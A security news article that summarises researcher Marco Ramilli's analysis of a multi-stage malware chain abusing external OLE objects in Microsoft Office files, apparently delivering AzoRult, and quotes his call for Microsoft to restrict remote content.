In the nefarious domain of malware attacks, researcher Marco Ramilli has discovered a slight glitch which can exploit Microsoft Office tools, specifically, the Excel, Word, and PowerPoint for malware attacks.
The feature exploit can possibly lead to malware drops and repeated cyber attacks including Phishing. MS office becomes an easy prey due to its rising ranks of popularity among digital enthusiasts.
Sharing a striking resemblance to phishing, the execution of the attack involves the malicious file directing the victim to a link having the payload.
While the technical details of the exploit have been elucidated by the researcher in his blog post, here is a summarized step by step execution of the same.
As the attack unfolds, the infected file in its execution falsely appears to have a blank page, but stealthily secures a connection to a malicious link which is the first stage of the attack.
In the second stage, the researcher examined the slide structure and an external OLEobject caught his eye which he further analyzed to conclude that the target device was already infected by the file downloaded on the system, i.e., wraeop.sct.
Moving further towards the stage 3 of the attack, it witnesses the utilization of an internal image to execute additional code which then leads to the final stage i.e., the payload execution.
After detailed traffic analysis, Ramilli has drawn conclusions suspecting the malware to be AzoRult.
MS Office exploits: not a bizarre discovery
In the past year, cybercriminals ran a massive malware campaign which involved malicious PowerPoint email attachments. Therefore, one can easily conclude that the present discovery though peculiar lacks novelty as the exploit for dropping malware is not the first of its kind.
However, these findings need to be treated with consideration as Ramilli cautioned us that we, the MS office users are susceptible to the attack at the moment. Potentially speaking, the exploit can lead to an eruption of cyber attacks if preventive measures are not timely devised.
“Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content.” Ramilla said in his blog post.
